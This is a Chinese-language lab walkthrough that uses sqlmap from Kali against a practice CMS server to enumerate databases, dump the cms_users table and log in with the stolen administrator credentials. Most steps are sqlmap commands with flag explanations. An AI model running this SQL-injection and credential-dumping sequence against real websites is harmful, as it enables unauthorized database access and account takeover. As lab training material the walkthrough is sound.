sqlmap獲取數據庫名?利用sqlMap工具攻擊網站,進入數據庫(MySQL),獲取管理員賬号和密碼,登錄網站kali系統有SqlMap工具,所以用kali系統作為攻擊機,靶機是一個文章管理系統的網站服務器(所用環境來源于360),接下來我們就來聊聊關于sqlmap獲取數據庫名?以下内容大家不妨參考一二希望能幫到您!
利用sqlMap工具攻擊網站,進入數據庫(MySQL),獲取管理員賬号和密碼,登錄網站。kali系統有SqlMap工具,所以用kali系統作為攻擊機,靶機是一個文章管理系統的網站服務器。(所用環境來源于360)
靶機ip:172.23.188.13
第一步:在kali系統浏覽器訪問web服務器
命令:
http://172.23.188.13:8083/show.php?id=3
172.23.188.13:靶機ip 8083 是端口
第二步:在kali系統終端上,進行sql注入,獲取數據庫信息
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3
在執行過程中,會詢問配置選擇時,都默認輸入yes或y,如下圖
在選擇完默認配置之後,會顯示出web服務的信息,如下圖
第三步:獲取web服務器上的數據庫信息
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 --dbs
--dbs 是查看所有數據庫
執行完命令之後獲得數據庫信息如下
第4步:進入查看數據庫cms中的表
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms --tables
-D 是查看某個數據庫, cms是數據庫名,用來查看cms數據庫
--tables 查看數據庫中所有的表
命令執行完之後,結果如下。cms_users應該是存放用戶帳号和密碼的表
第5步:進入cms數據庫中的cms_users表,查看所有的字段命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns
-T 是查看某個數據表, cms_users是表名,用來查看cms_users表
--columns 查看的表中的所有字段
執行完命令得到結果
第6步:進入cms數據庫中的cms_users表,查看所有的字段,及字段的内容
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns --dump
-T 是查看某個數據表, cms_users是表名,用來查看cms_users表
--columns 查看的表中的所有字段
--dump 查看所有字段的内容
在執行過程中,會詢問4次配置選擇,選擇如下
得到結果如下:
第7步:用帳号密碼登錄網站
結果登錄成功,如下圖
更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!